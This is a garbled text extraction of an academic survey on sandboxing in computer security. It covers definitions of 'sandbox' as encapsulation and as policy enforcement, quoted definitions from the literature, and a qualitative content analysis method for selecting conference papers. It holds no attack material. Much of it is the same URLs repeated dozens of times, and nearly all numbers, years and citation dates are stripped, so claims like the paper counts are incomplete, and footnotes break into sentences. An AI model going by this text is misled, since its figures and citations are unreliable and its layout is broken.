/are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://security.stackexchange.com/questions/ /are-sandboxes-overrated http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://en.wikipedia.org/w/index.php?title=sandbox_(computer_security)&oldid= http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://dx.doi.org/ . /peerj-cs. we found potential sandboxing papers. out of these papers, use the term “sandbox” at least once, and provide either an explicit or implicit definition of the term that is clear enough to characterize. the remaining papers that use the term make no attempt at a definition or provide an ambiguous explanation, intertwined with other ideas, and spread over multiple sentences. within the set of definitions we identify two themes: sandboxing as encapsulation and sandboxing as policy enforcement. sandboxing as encapsulation has a natural analogy: sandboxes on playgrounds provide a place for children to play with indisputably-defined bounds, making the children easier to watch, and where they are less likely to get hurt or hurt someone else. they also contain the sand, thus preventing it from getting strewn across neighboring surfaces. a similar analogy is used in an answer on the security stackexchange to the question, “what is a sandbox?” indeed, wahbe was working to solve the problem of encapsulating software modules (to keep a fault in a distrusted module from affecting other modules) when he popularized the term in this domain. while it is clear from at least one publication that the term sandbox was used in computer security earlier than wahbe’s paper (neumann, ), many early software protection papers cite wahbe as the origin of the “sandbox” method (zhong, edwards & rees, ; wallach et al., ; schneider, ). at least one early commentator felt that this use of the term “sandbox” was merely renaming “trusted computing bases” (tcb) (mclean, ). we believe this section makes it clear that sandboxes meet common tcb definitions, but that not all tcbs are sandboxes. table lists the definitions we found that we characterize as falling within the theme of sandboxing as isolation. many of these definitions use the term “isolation,” but we prefer the use of encapsulation. in object oriented programming, an object encapsulates related components and selectively restricts access to some of those components. isolation, on the other hand, sometimes refers to a stronger property in which modules use entirely different resources and therefore cannot interfere with each other at all. sandboxed components often need to cooperate to be useful. cooperation and the idea of disjoint resources are present in wahbe’s original use of the term “sandbox”: wahbe was trying to reduce the communication overhead present in hardware fault isolation by instead creating software domains that run in the same hardware resources, but that do not interfere when faulty. one potential counterpoint to our use of “encapsulation” is that the term typically is used to refer to cases where the inside (e.g., of an object) is protected from the outside, but sandboxes often protect the external system from the contents of the sandbox. while this is a fair point, this paper does discuss sandboxes that protect their contents from the outside and sandboxes exist that simultaneously defend the inside from the outside and vice versa (li et al., ). furthermore, one can consider that a sandbox encapsulates an external system that must be protected from a potentially malicious component. given these points, we maintain that encapsulation’s recognition of cooperation is important enough to use the term over isolation. nevertheless, we retain the use of isolation when discussing existing definitions. table presents seven quotes that discuss sandboxing in terms of restrictions or policy enforcement. these definitions reflect different dimensions of the same idea: a security policy can state what is allowed, verboten, or both. the “sandbox” is the subject that enforces the policy or “sandboxing” is the act of enforcing a policy. in short, these quotes cast sandboxing as policy enforcement. careful inspection of our definition tables shows that the same technique, sofware- based fault isolation (sfi), appears in both tables. zhang explicitly states that hardening is not used in sfi, but mccamant very clearly refers to operations being “allowed” and the existence of a policy. while it could seem that the sandboxing as isolation and sandboxing as maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table definitions that speak about “sandboxing” in terms of isolation. reference quote zhang et al. ( ) “sfi (software(-based) fault isolation) uses instruction rewriting but provides isolation (sandboxing) rather than hardening, typically allowing jumps anywhere within a sandboxed code region.” zeng, tan & erlingsson ( ) “it is a code-sandboxing technique that isolates untrusted modules from trusted environments. . . . in sfi, checks are inserted before memory-access and control-flow instructions to ensure memory access and control flow stay in a sandbox. a carefully designed interface is the only pathway through which sandboxed modules interact with the rest of the system.” geneiatakis et al. ( ) “others works have also focused on shrinking the attack surface of applications by reducing the parts that are exposed to attack, and isolating the most vulnerable parts, using techniques like sandboxing and privilege separation.” de groef et al. ( ) “isolation or sandboxing based approaches develop techniques where scripts can be included in web pages without giving them (full) access to the surrounding page and the browser api.” cappos et al. ( ) “such sandboxes have gained widespread adoption with web browsers, within which they are used for untrusted code execution, to safely host plug-ins, and to control application behavior on closed platforms such as mobile phones. despite the fact that program containment is their primary goal, flaws in these sandboxes represent a major risk to computer security.” reis et al. ( ) “wagner et al. use system call interposition in janus to confine untrusted applications to a secure sandbox environment.” cox et al. ( ) “our work uses vms to provide strong sandboxes for web browser instances, but our contribution is much broader than the containment this provides.” policy enforcement camps are disjoint, we claim they are talking about different dimensions of the same idea. isolation refers to the what: an isolated environment where a module cannot do harm or be harmed. policy enforcement refers to the how: by clearly defining what is or is not allowed. to use another childhood analogy, we often sandbox children when we place them in the corner as a punishment. we isolate them by moving them away from everyone else and placing them in a specific, bounded location, then we impose a security policy on them by making statements such as, “do not speak, look straight ahead, and think about what you did.” we resolve ambiguity in the use of the term “sandbox” by combining these themes: sandbox an encapsulation mechanism that is used to impose a security policy on software components. this definition concisely and consistently describes the research sandboxes we identify in the remainder of this paper. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table definitions that speak about “sandboxing” in terms of policy enforcement. reference quote xu, saı̈di & anderson ( ) “we automatically repackage arbitrary applications to attach user-level sandboxing and policy enforcement code, which closely watches the applications behavior for security and privacy violations such as attempts to retrieve a users sensitive information, send sms covertly to premium numbers, or access malicious ip addresses.” chandra et al. ( ) “the re-executed browser runs in a sandbox, and only has access to the client’s http cookie, ensuring that it gets no additional privileges despite running on the server.” politz et al. ( ) “adsafe, like all web sandboxes, consists of two inter-dependent components: ( ) a static verifier, called jslint, which filters out widgets not in a safe subset of javascript, and ( ) a runtime library, adsafe.js, which implements dom wrappers and other runtime checks.” tang, mai & king ( ) “fundamentally, rule-based os sandboxing is about restricting unused or overly permissive interfaces exposed by today’s operating systems.” sun et al. ( ) “sandboxing is a commonly deployed proactive defense against untrusted (and hence potentially malicious) software. it restricts the set of resources (such as files) that can be written by an untrusted process, and also limits communication with other processes on the system.” mccamant & morrisett ( ) “executing untrusted code while preserving security requires that the code be prevented from modifying memory or executing instructions except as explicitly allowed. software-based fault isolation (sfi) or “sandboxing” enforces such a policy by rewriting the untrusted code at the instruction level.” provos ( ) “for an application executing in the sandbox, the system call gateway requests a policy decision from systrace for every system call.” methodology in this section, we discuss the steps we took in order to select and analyze sandboxing papers and the sandboxes they describe. our methodology is primarily based on the book “qualitative content analysis in practice” (qca) (schreier, ). barnes ( ) provides a succinct summary of the methodology in section . of his dissertation. this methodology originates in the social sciences (berelson, ; krippendorff, ; denzin & lincoln, ) and is intended to repeatably interpret qualitative data to answer a set of research questions. figure summarizes the iterative process we used to define our questions, pick and interpret papers (‘picking papers’ and ‘categorizing the dataset’), and develop our results (‘analyzing the dataset’). qca goes well beyond a systematic literature review (budgen & brereton, ; kitchenham et al., ). while both qca and systematic reviews require the definition of research questions and repeatable processes for collecting source material, reviews stop short of detailed analysis. qca carries on where reviews end. when performing qca, researchers define coding frames to clearly and repeatably establish how the source material will be interpreted to answer the research questions. the frames contain maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the iterative process used to define research questions, build a dataset, and interpret the set to answer the questions. this process is inspired by qca (schreier, ). codes that summarize blocks of data and definitions for each code. furthermore, qca methodologies dictate how the coding frames are to be applied, by segmenting the entirety of the data such that each segment can labeled with at most one code. this ensures that the data is coded without missing relevant data and while reducing the researcher’s bias towards some bits of data. finally, qca requires researchers to test their full process before carrying out the analysis. together, these steps allow researchers to reliably and effectively we followed the qca methodology specified by schreier with one major deviation. we did not segment the text because the vast majority of the content in the papers is irrelevant to our needs. most uses of qca attempt to capture content of a text in its entirety. this was not our goal so we analyzed text more selectively. interpret text to answer research questions that are not possible to answer using a purely quantitative analysis. for example, schreier points out that a quantitative analysis can determine how many women appear in magazine advertisements relative to men, but a qualitative analysis (e.g., qca) is required to determine whether or not women are more likely to be placed within trivial contexts than men in those ads (schreier, , p. ). maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the sandboxes we describe in this paper were selected from the proceedings of five conferences: ieee symposium on security and privacy (oakland), usenix security, acm conference on computer and communications security (ccs), acm symposium on operating system principles (sosp), and usenix symposium on operating system design and implementation (osdi). we restricted our selection to particular conferences to improve reproducibility—because of this choice, the set of papers evaluated against our inclusion criteria is very well defined. to select these conferences, we collected all of the sandboxing papers we were aware of and the selected five venues contained far more sandboxing papers than any other venue. based on earlier criticism of this paper, we reevaluated our data set by looking at the past four years of proceedings at unselected venues such as the usenix annual technical conference (atc), programming language design and implementation (pldi), and object-oriented programming, systems, languages and applications (oopsla). these venues contained fewer sandboxing papers than our selected venues, and those that appeared were not significantly different in form or content from those in selected venues. in fact, with rare exceptions, the sandboxing papers at the unselected venues were written by the same authors as one or more paper in our data set. the selected conferences are widely regarded as the top-tier conferences in software security and operating systems (http://www.core.edu.au/index.php/conference-rankings, https://personal.cis.strath.ac.uk/changyu.dong/ranking.html, http://faculty.cs.tamu.edu/ guofei/sec conf stat.htm, http://webdocs.cs.ualberta.ca/∼zaiane/htmldocs/confranking. html). therefore, our data reflects the consensus of large communities. table presents our twelve research questions, the areas each question attempts to illuminate, and a comprehensive list of their answers as manifested by our paper corpus. we derived an initial set of questions by considering which broad aspects of sandboxes are poorly understood and where better understanding may change how the community performs research in this space. as a result, the questions are necessarily biased by our own backgrounds and personal experiences. in particular, this led to an emphasis on questions about how mechanisms and policies are derived, applied, and evaluated. we added questions while we performed the analysis when we found that we had the data to answer new and interesting questions. overall, these questions aim to capture a comprehensive snapshot of the current state of sandboxing research, with an emphasis on where sandboxes fit into the process of securing software systems, what policies are enforced and how they are defined and constructed, and what claims are made about sandboxes and how those claims are validated. picking papers we selected papers from years worth of proceedings at the five conferences mentioned above. we decided whether a paper was included in our sample based on rigorous inclusion criteria so the process of including/excluding papers is repeatable. the most important criterion is that the paper describes a sandbox that meets the definition given in ‘what is a sandbox?’. the remaining criteria were added as we carried out the study to exclude papers that are incapable of answering the research questions and to clarify relevant nuances in the definition. papers were included if they met the following criteria: • the paper documents the design of a novel tool or technique that falls under the sandbox definition • the paper is a full conference paper • the paper is about an instance of a sandbox (e.g., not a component for building new sandbox tools, theoretical constructs for sandboxes, etc.) maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings http://www.core.edu.au/index.php/conference-rankings https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html https://personal.cis.strath.ac.uk/changyu.dong/ranking.html http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm 